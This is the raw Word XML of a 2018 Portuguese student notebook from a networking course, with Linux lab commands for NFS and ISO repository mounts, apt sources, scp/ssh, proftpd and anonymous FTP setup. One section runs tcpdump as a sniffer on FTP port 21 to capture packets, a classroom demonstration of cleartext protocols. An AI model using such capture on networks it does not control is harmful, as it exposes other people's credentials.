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3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ADERNO DE ANOTAÇÕES</w:t>
      </w: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URSO TÉCNICO DE REDES DE COMPUTADORES</w:t>
      </w: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TIFFANY DA SILVA PANEGALLI</w:t>
      </w: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382156" w:rsidRPr="006E2401" w:rsidRDefault="00382156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</w:p>
    <w:p w:rsidR="00251FAA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JANDIRA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1636D" w:rsidRPr="006E2401" w:rsidRDefault="00251FAA" w:rsidP="006E2401">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center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2018</w:t>
      </w:r>
      <w:r w:rsidR="00F1636D" w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00251FAA" w:rsidRPr="006E2401" w:rsidRDefault="00F1636D" w:rsidP="006E2401">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/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lastRenderedPageBreak/>
        <w:t>PREPARAÇÃO DO AMBIENTE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B3894" w:rsidRPr="006E2401" w:rsidRDefault="00260901" w:rsidP="00F07015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ACESSO NFS AO REPOSITÓRIO LOCAL – DEBIAN 8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howmount -e 10.107.132.20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kdir /mnbt/repo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ount -t nfs 10.107.132.20:/home/celso/FTP/Linux/Debian87 /mnt/repo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ls -l /mnt/repo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eq 3 | xargs -I@ echo deb file:/mnt/repo/blu@ jessie main contrib &gt; /etc/apt/sources.list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 update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 install [program]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7B3894" w:rsidRPr="006E2401" w:rsidRDefault="007B3894" w:rsidP="00F07015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ACESSO NFS AO REPOSITÓRIO LOCAL – DEBIAN 9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howmount –e 10.107.132.20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kdir /mnt/</w:t>
      </w:r>
      <w:r w:rsidR="00B30434">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>repo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ount –t nfs –o nfsvers=3 10.107.1</w:t>
      </w:r>
      <w:r w:rsidR="00B30434">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>32.20:/home/celso/FTP /mnt/repo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B3894" w:rsidRPr="006E2401" w:rsidRDefault="00B3043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ls /mnt/repo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B3894" w:rsidRPr="006E2401" w:rsidRDefault="004332A1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kdir /mnt/share</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B3894" w:rsidRPr="006E2401" w:rsidRDefault="004332A1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kdir /mnt/share</w:t>
      </w:r>
      <w:r w:rsidR="007B3894" w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/blu1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B3894" w:rsidRPr="006E2401" w:rsidRDefault="004332A1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kdir /mnt/share</w:t>
      </w:r>
      <w:r w:rsidR="007B3894" w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/blu2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B3894" w:rsidRPr="006E2401" w:rsidRDefault="004332A1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kdir /mnt/share</w:t>
      </w:r>
      <w:r w:rsidR="007B3894" w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/blu3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ount –t iso9660 –o loop,ro /mnt/</w:t>
      </w:r>
      <w:r w:rsidR="004332A1" w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>repo</w:t>
      </w:r>
      <w:r w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/debian-9.3.0-amd64-BD-1.iso /</w:t>
      </w:r>
      <w:r w:rsidR="004332A1" w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mnt/share</w:t>
      </w:r>
      <w:r w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/blu1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o</w:t>
      </w:r>
      <w:r w:rsidR="004332A1" w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>unt –t iso9660 –o loop,ro /mnt/repo</w:t>
      </w:r>
      <w:r w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/debian-9.3.0-amd64-BD-2.iso /mnt/</w:t>
      </w:r>
      <w:r w:rsidR="004332A1" w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>share</w:t>
      </w:r>
      <w:r w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/blu2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ount –t iso9660 –o loop,ro /mnt/</w:t>
      </w:r>
      <w:r w:rsidR="004332A1" w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>repo</w:t>
      </w:r>
      <w:r w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/debian-9.3.0-amd64-BD-3.iso /mnt/</w:t>
      </w:r>
      <w:r w:rsidR="004332A1" w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>share</w:t>
      </w:r>
      <w:r w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/blu3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ls –l /mnt/</w:t>
      </w:r>
      <w:r w:rsidR="004332A1" w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>share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seq 3 | xargs –I@ echo </w:t>
      </w:r>
      <w:r w:rsidR="007E560B" w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>deb [trusted=yes] file:/mnt/share</w:t>
      </w:r>
      <w:r w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/blu@ stre</w:t>
      </w:r>
      <w:r w:rsidR="00404418">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ch main contrib &gt; /etc/apt/sources.list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B3894" w:rsidRPr="006E2401" w:rsidRDefault="007B3894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 update</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C26925" w:rsidRPr="006E2401" w:rsidRDefault="00C26925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 install [program]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B3894" w:rsidRPr="006E2401" w:rsidRDefault="007B3894" w:rsidP="00F07015">
      <w:pPr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8A183B" w:rsidRPr="006E2401" w:rsidRDefault="008A183B" w:rsidP="00F07015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INSTALAR INTERFACE GRÁFICA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 install xorg fluxbox wireshark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tartx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ab/>
        <w:t>&gt; no terminal shell bash: wireshark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ab/>
        <w:t>&gt; analyze - display filters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ab/>
        <w:t>&gt; capture - options - habilitar só a enp0s3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A183B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ab/>
        <w:t>&gt; filtrar só o ftp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00382156" w:rsidRDefault="00382156" w:rsidP="00F07015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382156">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ACESSO REMOTO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00382156" w:rsidRPr="00382156" w:rsidRDefault="00382156" w:rsidP="00382156">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00382156">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>enviar arquivo/ copiar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00382156" w:rsidRDefault="00382156" w:rsidP="00382156">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00382156">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>scp [nome do arq</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">uivo] [destino] -&gt; scp [name_archive] </w:t>
      </w:r>
      <w:r w:rsidRPr="00382156">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r3m@10.107.132.20:/home/r3m/script01/tiffany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382156" w:rsidRDefault="00382156" w:rsidP="00382156">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00382156">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>scp [nome d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">o arquivo] [destino] -&gt; scp se* </w:t>
      </w:r>
      <w:r w:rsidRPr="00382156">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r3m@10.107.132.20:/home/r3m/script01/tiffany</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E07428" w:rsidRDefault="001B31A1" w:rsidP="00382156">
      <w:pPr>
        <w:spacing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sh [usuário]@[IP] '[comando]'  -&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00E07428">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh r3m@10.107.132.20 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'mkdir /home/r3m/script02/tiffany'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E07428" w:rsidRDefault="00E07428" w:rsidP="00382156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817E8D" w:rsidRPr="00817E8D" w:rsidRDefault="00817E8D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817E8D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CÓDIGO DE CORES HTML</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00382156" w:rsidRDefault="00817E8D" w:rsidP="00382156">
      <w:pPr>
        <w:spacing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www.cultura.ufpa.br/dicas/htm/htm-cor2.htm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009837C6" w:rsidRDefault="009837C6" w:rsidP="00382156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9837C6" w:rsidRDefault="009837C6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9837C6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MONTAGEM DE PENDRIVE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009837C6" w:rsidRDefault="009837C6" w:rsidP="00382156">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fdisk -l</w:t>
      </w:r>
      <w:r w:rsidR="00C56750">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ou lsblk ou blkid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009837C6" w:rsidRDefault="009837C6" w:rsidP="00382156">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mkdir /media/usb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009837C6" w:rsidRDefault="009837C6" w:rsidP="00382156">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mount /dev/sdb1 /media/usb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009837C6" w:rsidRPr="009837C6" w:rsidRDefault="009837C6" w:rsidP="00382156">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>umount /media/usb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00382156" w:rsidRDefault="00382156" w:rsidP="00382156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FC126D" w:rsidRPr="00FC126D" w:rsidRDefault="00FC126D" w:rsidP="00FC126D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FC126D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ENCONTRAR ARQUIVOS NO LINUX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC126D" w:rsidRDefault="00FC126D" w:rsidP="00382156">
      <w:pPr>
        <w:spacing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find / -iname &lt;archive/directory name&gt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iname=ignorar maiúsculas e minúsculas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC126D" w:rsidRDefault="00FC126D" w:rsidP="00382156">
      <w:pPr>
        <w:spacing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find / -name &lt;archive/directory name&gt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name=nome exato do arquivo ou diretório</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00382156" w:rsidRDefault="00382156" w:rsidP="00382156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F1636D" w:rsidRPr="006E2401" w:rsidRDefault="00F1636D" w:rsidP="00382156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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD023A" w:rsidRPr="006E2401" w:rsidRDefault="00DD023A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pStyle w:val="Ttulo1"/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ERVIÇOS PARA INTERNET</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A183B" w:rsidRPr="006E2401" w:rsidRDefault="002050EE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>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TCPDUMB -SNIFFER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apt install tcpdumb </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D0A35" w:rsidRDefault="006D0A35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sniffer [ftp=21] [ssh=22] [telnet=23]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tcpdumb -vvv -nAs0 -i enp0s3 port 21 &gt;</w:t>
      </w:r>
      <w:r w:rsidR="006D0A35">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> captura.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D0A35" w:rsidRPr="00650D85" w:rsidRDefault="008A183B" w:rsidP="006D0A35">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708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&gt; olhar o arquivo</w:t>
      </w:r>
      <w:r w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>captura.txt para ver os pacotes capturados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D0A35" w:rsidRPr="006E2401" w:rsidRDefault="006D0A35" w:rsidP="006D0A3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apt-get install xorg fluxbox wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A183B" w:rsidRPr="006E2401" w:rsidRDefault="008A183B" w:rsidP="006E2401">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A183B" w:rsidRPr="006E2401" w:rsidRDefault="008A183B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 w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CONFIGURAR O MODO ANÔNIMO NO FTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00825070" w:rsidRDefault="00825070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pt install proftpd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nano /etc/proftpd/proftpd.conf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ab/>
        <w:t xml:space="preserve">&gt; tirar o comentário da linha 149-188 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ab/>
        <w:t>&gt; salvar e sair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/etc/init.d/proftpd restart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d /srv/ftp (home do usuário anônimo)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at welcome.msg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ab/>
        <w:t xml:space="preserve">&gt; apagar tudo e escrever msg de boa vindas </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A183B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ab/>
        <w:t>&gt; salvar e sair</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00650D85" w:rsidRPr="00650D85" w:rsidRDefault="00650D85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 w:rsidRPr="00650D85">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CONFIGURAR O FTP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apt-get install proftpd-basic proftpd-doc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 xml:space="preserve">vi /etc/proftpd/proftpd.conf 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linha 11 desabilitar o ipv6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 xml:space="preserve">linha 15 colocar no o nome do host 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linha 18 estar em standalone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DisplayConnect /usr/local/etc/proftpd.banner (arquivo de boas vindas) -&gt; adicionar na última linha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service proftpd restart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vi /etc/hosts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127.0.1.1 e o nome do host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650D85" w:rsidRPr="007F5F37" w:rsidRDefault="007F5F37" w:rsidP="00650D85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto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ara "enjaular</w:t>
      </w:r>
      <w:r w:rsidR="00650D85" w:rsidRPr="007F5F37">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">" 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vi /etc/proftpd/proftpd.conf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 xml:space="preserve">linha 36 </w:t>
      </w:r>
      <w:r w:rsidR="007F5F37">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; descomentar e escrever DefaultRoot </w:t>
      </w:r>
      <w:r w:rsidR="007F5F37">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00650D85">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>~/ftp -&gt; para ter somente acesso a home do usúario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service proftpd restart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criar o diretorio ftp na home do usúario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configurar ftp para acesso anonimo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linha 149 -&gt; configuração de usúario anônimo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 xml:space="preserve">       .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 xml:space="preserve">   Descomentar tudo (somente a primeira hastag)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 xml:space="preserve">       .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00650D85" w:rsidRPr="00650D85" w:rsidRDefault="00650D85" w:rsidP="00650D85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00650D85">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>linha 188 -&gt; fim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8A183B" w:rsidRPr="006E2401" w:rsidRDefault="008A183B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 w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ACESSO </w:t>
      </w:r>
      <w:r w:rsidR="002050EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SEGURO AO FTP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ftp -P 2222 aluno@19</w:t>
      </w:r>
      <w:r w:rsidR="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.168.0.114 (logar no servidor)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A183B" w:rsidRPr="006E2401" w:rsidRDefault="008A183B" w:rsidP="006E2401">
      <w:pPr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love o boy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A183B" w:rsidRPr="006E2401" w:rsidRDefault="008A183B" w:rsidP="006E2401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color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00213251" w:rsidRPr="006E2401" w:rsidRDefault="008A183B" w:rsidP="00946841">
      <w:pPr>
        <w:pStyle w:val="Ttulo2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color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DNS – DOMAIN NAME SYSTEM</w:t>
      </w:r>
      <w:r w:rsidRPr="006E2401">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00213251" w:rsidRPr="006E2401" w:rsidRDefault="00213251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Tipos de DNS</w:t>
